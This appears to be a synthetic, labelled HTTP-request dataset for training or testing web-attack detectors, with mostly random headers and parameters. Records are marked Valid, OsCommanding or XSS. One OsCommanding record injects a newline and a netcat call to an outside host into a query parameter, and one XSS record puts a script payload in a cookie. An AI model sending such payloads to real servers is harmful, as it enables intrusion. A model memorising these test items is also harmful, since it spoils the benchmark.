Accept-Charset: euc-tw, hz-gb-2312;q=0.8
Accept-Encoding: gzip, deflate;q=0.3, gzip;q=0.5
Accept-Language: ytas-sla7hx, nn-Updr, gh-dee;q=0.4
Cache-Control: only-if-cached
Client-ip: 32.10.53.131
Cookie: sl0R=l8l3iMr;amEjrms=liRRdlaWkfmtDcqh;l1Usshutdown=64258;a9aln=rf.;htOexec=3470848
Cookie2: $Version="5"
Date: Sat, 16 Apr 05 11:12:42 GMT
ETag: "Ala8XxVK9Sh-lb6G@F"
Expect: Aaakre3t=bPm8Duh;h4pbg6
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Thu, 01 Jan 09 02:05:55 GMT
If-Match: "SlYExWD.61oQyU7SHA"
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Sun, 21 Sep 08 21:52:12 UTC
Max-Forwards: 7
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: bMhsg esQt=Vnate6
Range: 8094-,77-91254,-8945
Referer: /nKcjw/eiodzsso.gif
TE: chunked
Trailer: If-None-Match
User-Agent: ttwret3k/5.2.1.7
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: nee2iV/8.8 www.lsure.tiff, 1.4 253.238.240.73
Transfer-Encoding: deflate
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47542
Start - Id: 7718
class: Valid
POST /0i8t/autnrgt/cGeyy5cfH/fda85rsxnbdh/RieoyutNko/iupnia37schtnnloA/AbittnrdPoEosu.php3? HTTP/1.1
Content-Length: 175
Content-Language: rnsxnbF,nxaW62
Content-Encoding: deflate
Content-Location: http://ngjs.fr/torrblos/Syeites/Pbncpz.sh
Content-MD5: bHJucjJvdHR3dEFlZWhheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Aug 07 11:26:50 GMT
Last-Modified: Sun, 03 Feb 08 16:24:22 UTC
Host: www.pEDop.cz
Connection: aaeabh
Accept: image/jpeg;q=0.6, image/gif;q=0.5
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: aud-ts;q=0.0, ois8n-rcY;q=0.4, Keo4bye9-tahaeo3o;q=0.0
Cache-Control: min-fresh=4977
Client-ip: 53.244.216.41
Cookie: wotr=tSilth;NwbDDNWo8=wis;e9fdtn6n=6OtoeogteyDlet;ttawersi=606266
Cookie2: $Version="5"
Date: Tue, 03 Feb 09 10:17:46 GMT
ETag: "Lq7IiLf280N95wqM-yI"
Expect: 100-continue
From: hmytnwrh@n44u6.net
If-Modified-Since: Wed, 11 Aug 04 06:34:09 CET
If-Unmodified-Since: Sat, 26 Aug 06 24:06:31 CET
If-Match: *
If-None-Match: "CsPlLT6uMbFrUeivp"
If-Range: *
Max-Forwards: 2981
MIME-Version: 7.7
Pragma: wn=djTeprae
Proxy-Authorization: NTLM cnltaHNmN2tjcHJ0YXNyZm9JdEllN3JwdGVlMGRldW5kU3JhWnk=
Authorization: Basic VG1pbjpOdDRvZXc4
Range: 379802-58050
Referer: /jAuqa23/sSVtW/Mlfnsed/nehLO.jsp
TE: trailers,chunked,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 6.6; nr-ud; rv:6.7.6) Gecko/45162789
UA-CPU: Sparc
UA-Disp: 679,410,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 093x4978
Via: 7.5 www.3r9bnon.htm
Transfer-Encoding: gzip
Upgrade: rgaM/6.2, eac/6.8, aZco/9.9, tRa/2.6, hle/2.5
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 52480
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mikets=gtep&se4fiporfs=36&e1aretjahe=489265638&6utgae=26&nioNhhji=d&eZbdeseumhagfio=rln&rlehwt=:rTi&tsefhlddidE=i6obfromtyis%p$1h5gts&upujp1sseii=E doitiwindow.openaeynd

End - Id: 7718
Start - Id: 3957
class: Valid
POST /0gao/Uhc/0Aservices@-QCMxHL/vom5IobjectWj5T/f5t-passthrur@R/Isneb/irwrt/oeo40hcelTudbopc/L2zHOudgKMX/d9uctahsirgo/itoazctozcr/ZgZ.Dez4@_-xp_xT9.shtml? HTTP/1.1
Content-Length: 146
Content-Language: u
Content-Encoding: compress
Content-Location: /we1e9s/adE1nme/aouN4ne/iumemE/eWnn.shtml
Content-MD5: blV6ZWljZW9wbjRzdDhuZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Tue, 23 Aug 05 16:37:53 CET
Host: www.hhenn.biz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=441
Client-ip: 129.13.135.93
Cookie: yeeeho=l0echohTbgsoundpDt
Cookie2: $Version="1"
Date: Sun, 21 Feb 10 11:28:24 CET
ETag: "ZwOjg37xNVfz50EU4Ou"
Expect: 100-continue
From: oot8era@uner0.de
If-Modified-Since: Thu, 14 Dec 06 06:16:55 GMT
If-Unmodified-Since: Thu, 22 Mar 07 06:35:08 GMT
If-Match: "2rJj_fCrOzPgZxLfEM"
If-None-Match: "3V6@lu6Q1ZrqcM8jW9b"
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 7540
MIME-Version: 7.1
Pragma: emt='brmst'
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: Basic YXdxczpkYmhqZWk=
Range: 896403-560156,-23134
Referer: http://www.errme.com/Unqruap/iottqt3/i1cEetM/ntiison/mwtN.conf
TE: gzip
Trailer: Accept
User-Agent: lgeqe (8K3hSzg)
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: 0.4 204.197.93.74, TayRto/1.0 43.177.159.18
Transfer-Encoding: gzip
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 936 www.tr75t.jpg "uttrnpTleng4ul" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QxJ8N=cC-54BJC&usude=129023&a5emtawa=nhxoo452faippl&nca=h_Y&Hnras7ox=bEEQSs1WHYvd&yya5mnd=471078&srEniowxitogsep=t&ehol6hfib=unsh&fsbelfAe1up=gurn

End - Id: 3957
Start - Id: 26682
class: Valid
GET /itct.cgi?nhokfyed=ekDDMem&wil7xstaIp=4829&Helu4=7002&tdnorgUnt=econnect&yAistX4ar2hm=a5cs&7aopmeta8W=ot3qdaA2nghRDse&o0diiritfmv=28807740&dnssxnetzNd57=dyrfi9XHC HTTP/1.0
Host: www.nklhl.cz
Connection: close
Accept: application/zip;q=0.0, text/*
Accept-Charset: windows-1253, x-mac-turkish, utf-8;q=0.1, iso-8859-6, x-mac-chinesetrad;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 110.81.19.33
Cookie: F6XBp=426867;.9E0sncQADwgetf=Ke<Tas;e4enaqnic=8102820;1freplacexmlc=1156631;sDH@Dv=iiizgmee;zbcmdj8kv=ltAkegliet
Cookie2: $Version="6"
Date: Tue, 09 Oct 07 03:19:52 GMT
ETag: "..6n.Srliekf7W5EV_"
Expect: l9B7meo=9eethcj
From: aenrotes@hoereselr.be
If-Modified-Since: Mon, 27 Jul 09 01:19:49 GMT
If-Unmodified-Since: Mon, 31 May 04 04:48:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.8
Pragma: ortc='i6'
Proxy-Authorization: Digest response="24ebD5f3BCcCec4f689DAfd20DcADAf6"
Authorization: 6t8s u4Aiulcw=d25b
Range: -9458
Referer: /thle/ygcitx/en5epa/opwheh/smnut.fgf
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (X11; U; Linux i586 9.1; wi-ds; rv:8.4.3) Gecko/23442344
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: 8.7 85.221.148.78, 1.5 90.238.121.206, 3.7 www.7sur.html
Transfer-Encoding: deflate
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 647 www.73orh.js "6zehdei0repaoct" "Sun, 20 Nov 05 12:22:26 GMT"
X-Forwarded-For: 27.113.189.139
X-Serial-Number: 7904628
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26682
Start - Id: 21217
class: Valid
GET /gAnQ/dmowNnlqlfeh/tAijjBP2/htnosmxntig8E/sumt6nOacza/dx_Sl/jAnex.h_U@hY/inYwwdB/nltnedhcmdenmncotyi8/BracceptYW.shtml?Htcsldayjatw=52582&sthts=491&ue285efq=a4g3w&tghrddepa=runioni&ttqhi3a=edyizgsyi2%40&NT.5wGkexecDnG=162601911&uabkeAa48gWirsa=677221426&1nobtAje=6381549&sdte3erNiis=irewinnt&tfhpdeel=te50stce7fEmsb&Dltixnst=97360&bmlds=f4YbZFi6v8&tclnejIero5r=77526994&fi=22 HTTP/1.1
Host: www.puT2.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tnwhn-wchansic;q=0.9, am-d, sr-ce, ty-o8e;q=0.5, adnhzox-ue;q=0.1
Cache-Control: r=loimu
Client-ip: 94.29.16.110
Cookie: UU5MlH9FqQt=|sock_streamt optj\tonphp?fand0a;9etlaeNnh=5ths8ue;simu=q>ynE)
Cookie2: $Version="49"
Date: Fri, 30 Jan 04 17:16:31 GMT
ETag: "J6k5_eWAz4_ASMA"
Expect: oybtosee
From: vEvaeak@i1auid.st
If-Modified-Since: Thu, 03 Mar 05 13:56:44 CET
If-Unmodified-Since: Wed, 28 Jun 06 04:10:02 GMT
If-Match: "WH0ICjBMFu-tfKa4DF"
If-None-Match: "AiP7mO3G5XXWWvL"
If-Range: Mon, 01 Feb 10 03:53:33 GMT
Max-Forwards: 96
MIME-Version: 6.1
Pragma: ao=fpp
Proxy-Authorization: NTLM eGVyZ3VybWRlc2ZsZmFkZnNvdG9haVd2NW5pNThzdXJzdHBldA==
Authorization: aoodrn d1ghPs=tutig
Range: 14-4533,9-6,-7926
Referer: http://www.bHcectg.com/w8edurih/aiRlit/oarmre/lsUD9t/oft5.php3
TE: gzip,gzip;q=0.8,gzip
Trailer: Upgrade
User-Agent: rseetaom
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: 0.9 www.aeeheeb.htm, 8.9 255.147.71.49:6638, 5.9 www.tgEbel.gif
Transfer-Encoding: identity
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 000063764579
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21217
Start - Id: 15459
class: Valid
GET /rOmiiao8olute8tnm/1mneqholmoooa6lsstFc/sxt8s3tmsie/e7e20@VhM77iKwM2E4J/rlqtf4-pip6SHA2UR/oXZ8aQS/oTufr1q/vUnSN5.LBE3t4A/uplvLbEHlrP/tA2gI/jmoptBM.php4? HTTP/1.0
Host: 43.212.115.196:80
Connection: keep-alive
Accept: video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip;q=0.1
Accept-Language: loTu-2rete;q=0.6, nl9-5itnsn0
Cache-Control: max-stale
Client-ip: 242.251.204.167
Cookie: ibdbfpnaltmapeh=eisE;lLnehustNoierps=30;tuwowmoeeqe=4n@ ;processing-instructionY.HD=s1KvEeB;tfaeNjt=5851
Cookie2: $Version="41"
Date: Tue, 16 Mar 10 20:51:01 GMT
ETag: "lkPa0YBlehJC984nmD"
Expect: im6qeg=istgc
From: areaH@nEI8mdx.biz
If-Modified-Since: Fri, 23 Jul 04 02:29:08 CET
If-Unmodified-Since: Fri, 17 Feb 06 21:48:56 UTC
If-Match: ".1tW-ZMkXI1QuDEoKXj3"
If-None-Match: "KwcPEVtcucPbGC1sk"
If-Range: "mWCA3VUOXz4dHAep"
Max-Forwards: 92
MIME-Version: 5.7
Pragma: dea2xd=ommufz
Proxy-Authorization: NTLM NWZ6b3Q2aWV0aEVOdGFhZ3Jhd2FlRWpFYXJlM2Vzd0VjZUE=
Authorization: NTLM YWw3cjBTamVpZ0dqcXRMdDlwZWZuS3R0dGxlNGR6cHBBcnRkbGpvcg==
Range: -54263
Referer: /lxde5en7/sNmef5/umanudea/ipnmun/Tymd.mpeg
TE: deflate
Trailer: Warning
User-Agent: aIsasdezas1aiaeuia
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1725x7516
Via: FTP/1.7 www.bnn7ye.jpg, ezseh/9.9 246.254.158.197:08458
Transfer-Encoding: totfh
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 569 www.Fu27pmk.js "2eoaar" "Thu, 15 May 08 10:27:48 GMT"
X-Forwarded-For: 23.106.63.82
X-Serial-Number: 83246160630295135066
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15459
Start - Id: 31579
class: Valid
GET /lni/0GuKMah/asnnh2auohiuane0ol/.lfyGHIDV1F-/k@5NMBUZHD@r8nNyVn2F/t6O8oTlgsOE9Ry/lm_R8Q9G/Z6/aaBue1Yokizy7wFk3Q.dll?ndoaed=aTL2dPEoe&aittogqtlgtzt=cnOtge9&5gLaE7smzs=kwpwIt&ott=nRSAL_&ed=218&d6=fH&FRWg7rI_0=nJOXZC3%40&110.ik.AGQ=566907&7rtse1hredsx=d3iTC5 HTTP/1.0
Host: www.da2Ssuhpvw.de:80
Connection: close
Accept: application/x-tar, video/*
Accept-Charset: big5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 19.207.118.61
Cookie: NTmisenabIat=566;7h1ecr=71386
Cookie2: $Version="6"
Date: Mon, 06 Jun 05 18:01:38 UTC
ETag: "CuscIHK5cT3kf6Hm"
Expect: ercS=tttkss
From: RtEis@avfE9.de
If-Modified-Since: Mon, 03 Dec 07 22:21:49 CET
If-Unmodified-Since: Wed, 23 Nov 05 20:21:01 GMT
If-Match: "ZPMZr240DBILCXBIZ7"
If-None-Match: "jowfQH21ip_VmeEMYsPO"
If-Range: "DwLiMiYpUm2Z-4kg"
Max-Forwards: 90
MIME-Version: 7.2
Pragma: 0eaqr=esn
Proxy-Authorization: Digest opaque="oesucl"
Authorization: NTLM NEZuT3RSZ0lSOGRsdGFhaTNFc2xpNnJoZGRvaHRycnNicnFITU82bE8=
Range: -40023,010285-,775998-
Referer: http://www.fsemrr.com/kklinF9a/duorta4/ohaa3n/eaAtheof.dll
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 3.5; Dr-ir; rv:2.4.6) Gecko/43531592
UA-CPU: PowerPC
UA-Disp: 165,316,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 951x498
Via: 0.9 www.nTuire.png:78, 5.5 www.menr.jpeg
Transfer-Encoding: identity
Upgrade: 13nw/2.3, boittr/0.2, wehuPi/3.1, zbnegf/5.6
Warning: 589 www.sraa.jpg:2 "qNtoiOeto6ouittmpa" "Sat, 31 Oct 09 17:56:47 GMT"
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 9453727833196
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31579
Start - Id: 10823
class: Valid
GET /a-YLyU7umD5ucFUjGf/QGHrCy/oivTaciw/0L2htpass_rZ/gk6oW9nN43@Z6_y6s/ri5S7La2Z8xQg8oubzsi/heteasde8saaa8Vdrhe/dSzilcj9uRvzou/uMXVR-z.mdb? HTTP/1.1
Host: www.ianeoCe.net
Connection: Aoro
Accept: */*;q=0.5
Accept-Charset: big5, windows-1258, x-mac-arabic;q=0.2, macintosh;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: ig5i='oMoEVk'
Client-ip: 198.44.230.163
Cookie: lmxhitlrGutbfpn=252483;H5E%ulocationcrTI.child=288558;Wchv8P.=EavOlcqp
Cookie2: $Version="2"
Date: Mon, 19 Jul 04 06:12:54 CET
ETag: W/"EAJK8SGgzYLV1svwviMA"
Expect: 100-continue
From: efCk@raAE5teBT.uk
If-Modified-Since: Mon, 30 Jun 08 11:02:18 CET
If-Unmodified-Since: Fri, 04 Sep 09 09:25:06 GMT
If-Match: "BYz0FzuRmQtz5pB"
If-None-Match: *
If-Range: Sun, 26 Jun 05 12:16:53 GMT
Max-Forwards: 721
MIME-Version: 8.9
Pragma: N=TNnagvea
Proxy-Authorization: NTLM bGRoYWlzQXJ0bmhzYzhrZDVubWthYXNzdWtzZG90c296YW1lc1lyZWRjZWNwZW4=
Authorization: Digest realm
Range: 491-
Referer: /2cns/dYq9anr8/io9cvy.jsp
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: rilotcn (ndi77bx; yg95adVFZd; ryqRj4; oaC4lowZ0)
UA-CPU: MIPS
UA-Disp: 751,4229,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 633x671
Via: 6.8 www.4rabtegs.shtml, 3.2 www.pasiftr3.jpeg
Transfer-Encoding: gzip
Upgrade: 3uen/0.9, a1ts/0.4, sidhd/7.5, fsam/4.5
Warning: 710 www.o4vrf.shtml "azenesqualg1oeEe" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 026884237453850145
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10823
Start - Id: 209
class: Valid
GET /ax/endKEk/oEhCdg/-qWainputKf/h2nhgJmt6VEPtnqs/J_p6W@3/saoin8rhoae66d/oynsn2i0nce/ocfzCXhE6C.css?n84oao5tg=471626687&WaRushc9sOtcrot=ise3nsioa5teytzi0p&Sctee=niiF&iostiafrNhat=025698941&iEedo=ned+thh%5B&ulfTt0iI=i_MT2Aa6PA%40-&kSa1ehcteamS9Dj=mp6-TlOZAOdO&ol=iehdrDjer7hpfthpIa HTTP/1.0
Host: 61.160.120.16:478
Connection: Ewmd
Accept: image/png, video/*;q=0.2, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ighhr-yad;q=0.8, oa-sTno;q=0.0
Cache-Control: only-if-cached
Client-ip: 223.208.250.121
Cookie: ncugb9iiy7e=eJBXhB;efe4enaea3nn=utO;et5taapqgsls=0867;1xsgtitsua=85
Cookie2: $Version="60"
Date: Wed, 09 Apr 08 03:58:47 GMT
ETag: W/"5OcIIHcnBRbkQ7Lfdxm"
Expect: sdieeA=c1uaefd
From: wnun9d@Ilphteim0h.ch
If-Modified-Since: Thu, 04 Oct 07 03:53:16 CET
If-Unmodified-Since: Sun, 04 Jun 06 14:52:31 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 12 Oct 09 12:52:58 UTC
Max-Forwards: 4506
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: NTLM cmVoZWhuc29yVGV1YWRIbWNhdXRkZWVyaDRjamxkeXJldHVhdGhvcmVsdA==
Range: 534828-
Referer: http://iqDt.gov/trdiu.pdf
TE: trailers,gzip;q=0.7
Trailer: From
User-Agent: yftgT/0.8.9
UA-CPU: StrongARM
UA-Disp: 0159,402,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4314x599
Via: 2.1 206.140.193.104, 9.3 www.su21niei.png
Transfer-Encoding: gzip
Upgrade: fpiAu/5.9, 9nelou/2.0
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 209
Start - Id: 16647
class: Valid
GET /tYjamNoJjyM-C/eddbhcTeBiohToT/RGr4tsam0V.php3?yjloU2tD=63108424&acnev1m=isbE_L&.BWz6STEfGk6=176591&toCi7smjsst=67518&sp=EobinseIkjst HTTP/1.1
Host: 243.79.36.249:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: utf-7, hz-gb-2312, windows-1257;q=0.5, x-mac-greek
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=005
Client-ip: 242.14.122.91
Cookie: XyRcatHiGphttp=2)iajcopymge9oua%A;mHqX=ctLwpwhyocpmdTeeh;nnsi=aserw;btaNtooseew7=591298
Cookie2: $Version="281"
Date: Thu, 21 Apr 05 20:13:46 UTC
ETag: "bdux4slUMi9e3E6P"
Expect: 8rOrt
From: 7beimH@indn.it
If-Modified-Since: Fri, 18 Nov 05 05:48:06 UTC
If-Unmodified-Since: Sat, 17 Jul 04 06:43:21 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Jun 05 10:34:27 UTC
Max-Forwards: 974
MIME-Version: 3.7
Pragma: Eirtnine='el7o5r'
Proxy-Authorization: Basic b2xtdDpuZHdu
Authorization: hmsefL a2irb=ahntosr
Range: -085,-96748
Referer: http://www.anfa.ch/heiLhie/E7oa/rmee6io/iyXoxtol/eOznll.msf
TE: deflate,chunked;q=0.5,trailers
Trailer: Warning
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 0.4; dn-qj; rv:7.9.8) Gecko/00587355
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: 3.0 138.14.121.128:2, 8.8 121.148.94.96, 1.1 www.tn6hp.jpeg
Transfer-Encoding: compress
Upgrade: n3amhi/4.3, hx6It8/3.4, tcc1Ue/2.8
Warning: 776 12.83.110.221:697 "intttghuuaPl" "Tue, 01 Mar 05 05:24:24 UTC"
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16647
Start - Id: 43523
class: OsCommanding
GET /HFAAdusrL/e5h0qpr0wup/ye@BMO3rCWp3Kusr/nOzRes-processing-instructionb/style_wgetYo/neSmeiwyynthercpwmwj/wp6olhxntTmted7ChE/tPV6w.msf?vzehTzytryRn=%250a+++++nc++www.nsattali.com++++80+++%3B HTTP/1.1
Host: www.jfat.net
Connection: sewLoba3
Accept: image/*, application/rtf, video/mpeg;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.8, gzip, gzip
Accept-Language: afle-n9z;q=0.7
Cache-Control: min-fresh=6535
Client-ip: 47.69.15.32
Cookie: xs=Ihhqe%urrgntei;tubostt=803
Cookie2: $Version="241"
Date: Fri, 20 Aug 04 21:36:17 UTC
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: rewl
From: ioojil@heyq.net
If-Modified-Since: Mon, 07 Sep 09 24:02:13 UTC
If-Unmodified-Since: Thu, 23 Apr 09 16:29:47 CET
If-Match: *
If-None-Match: "wnlTDEI15qNxuXbo"
If-Range: Tue, 11 Apr 06 16:26:45 CET
Max-Forwards: 5453
MIME-Version: 3.5
Pragma: unosnta9=cedd9naE
Proxy-Authorization: NTLM bHNwMmNsQ2JpT3RubWVzZmFpdGtpaG9sZGlPSGlpdUVoY28=
Authorization: nnsn shi3=qiRdkawr
Range: -2781,-259,93-77910
Referer: http://www.mij5anmr.be/ueew/bhenBe/rsdesJEe.php4
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: lqJZ-iS_ http://www.ttta.fr
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 956x530
Via: 8.2 www.rlonRrlt.tiff:87527, HTTP/2.3 236.72.8.74
Transfer-Encoding: gzip
Upgrade: itme/0.9
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43523
Start - Id: 46691
class: XSS
GET /ecgeanytewea2qit/5e/35vaOo/7eietdtmetditkei/bgsoundcqucopygF5S9RevalDk/9hYGfbWfnXam/ld-TG7aK8lOItisDXRw/eiieaenwo/aksiO04/M7_@A4A/pse.png?xoteczee6tlko=ceinrmrsh0&tatj6en=7862964601&eNle5aehqsaoay=7825&ZsUQ7nZbO7Jpasswd=hafnssooro&oeanWmvwT=a%3C%40&naogeoudhbieen=%5B&w81ibcude=Vil+dsnvl&veMedodzop=isock_streamru+%3Do%2Blif%27-&xdy5gs=reIkd&zeadt7lOh1f=n%2B%5Clb+Oguexecteeineo+%24&usrCElB=auol6il&0chlrrtshelo=n8ny9ttfku&we=79611 HTTP/1.1
Host: www.lE4an.de:80
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, x-mac-chinesesimp, windows-1257;q=0.2, x-mac-japanese;q=0.9, isiri-3342;q=0.5
Accept-Encoding: 
Accept-Language: o-totet, ddaazs-iaynbH, Iophdrn-ihlea
Cache-Control: no-transform
Client-ip: 141.164.135.166
Cookie: iyts8tut=<a    href= "  about:<s&#99;ript >[alert ('55aHoi');]</script>"    >
Cookie2: $Version="9"
Date: Thu, 03 Aug 06 19:37:21 UTC
ETag: "8TTEKt1bugfGuOjxFp1"
Expect: 100-continue
From: ewaeiu@9Hea3Eeae.cz
If-Modified-Since: Mon, 19 Apr 04 13:01:50 UTC
If-Unmodified-Since: Sat, 02 Aug 08 18:39:53 GMT
If-Match: *
If-None-Match: "D@jZU9zNHdI@1UXDWs_"
If-Range: Sun, 24 Jan 10 15:30:35 GMT
Max-Forwards: 7506
Pragma: no-cache
Proxy-Authorization: eu9g reaurh=an5mRwhe
Authorization: Basic VW5Jc2FpaGE6c3RudzZuaGY=
Range: -441983,369-,-36125
Referer: /mstdnwOr/ztutnni/m6roh/mNxyf.txt
TE: chunked;q=0.3,deflate,deflate
User-Agent: ituFV3Zb6E http://www.tlHnt8d.com
UA-Color: color32
UA-Pixels: 856x716
Via: 8.0 www.ntayneC.png, deNt/2.8 www.ni3ig8.jpg, 3.8 www.atzIaq2.css
Transfer-Encoding: identity
Warning: 104 www.tos7l9.gif "agNmpea" "Tue, 01 Jun 04 12:05:40 GMT"
X-Forwarded-For: 7.125.26.87
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46691
Start - Id: 23007
class: Valid
GET /talt/uRe@y_kS55ujQK334/nyzh/eT84rD_OaM_RAG4Hjh/Ef2N9qV3F/muwporeogunshs.htm?uhmnlHt=inxmldIbinputt0&xsystemySW=13351&nttRihjhwWsnhtc=t%40bogh5HR&jdd=2airtHe7Ycss53&ta=%24%40a%26e+bmsock_streamOevarwL&y4mochaxIilFMEPJ=r44&dkyyLpcrdi=uhf&w1nr9XvmoEmhgcq=Eupdaten HTTP/1.0
Host: 244.168.133.162:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, identity;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 122.210.73.33
Cookie: te4cchvobtbagut=Cees;rsdtH=kaoF6fZO;reeSnqrbdhr=0aolboot.ininXlmadusbgza
Cookie2: $Version="77"
Date: Mon, 26 May 08 09:35:00 GMT
ETag: W/"m2_.s_g7jYk-ibNrreCH"
Expect: 100-continue
From: reCec@atistonN.com
If-Modified-Since: Tue, 05 Oct 04 21:53:42 UTC
If-Unmodified-Since: Mon, 17 May 04 13:21:21 UTC
If-Match: "9yA2RPrkfM-qu4@ZgV"
If-None-Match: *
If-Range: Sun, 01 Nov 09 11:05:56 CET
Max-Forwards: 50
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: fmr5 Ld67ld=n9o0r
Authorization: Omro07 arelmOi=Nuwnav
Range: 46141-509,21195-,-1
Referer: /htnuh/blsF0ea/l5nraWe/nquHwa.avi
TE: deflate;q=0.7,trailers,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/7.0 (X11; U; Linux i586 5.3; Ee-HH; rv:6.9.9) Gecko/94704336
UA-CPU: MIPS
UA-Disp: 4117,1833,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: 3xItr/8.0 177.160.69.52, 0.8 www.bryJ3eP.css:99743
Transfer-Encoding: compress
Upgrade: 9p2tdD/2.8, aeolon/3.0, ieaa/7.4, clo/8.1
Warning: 276 182.198.71.222 "ritnnni6tisiwysartb8" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 782598520003
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23007
Start - Id: 10344
class: Valid
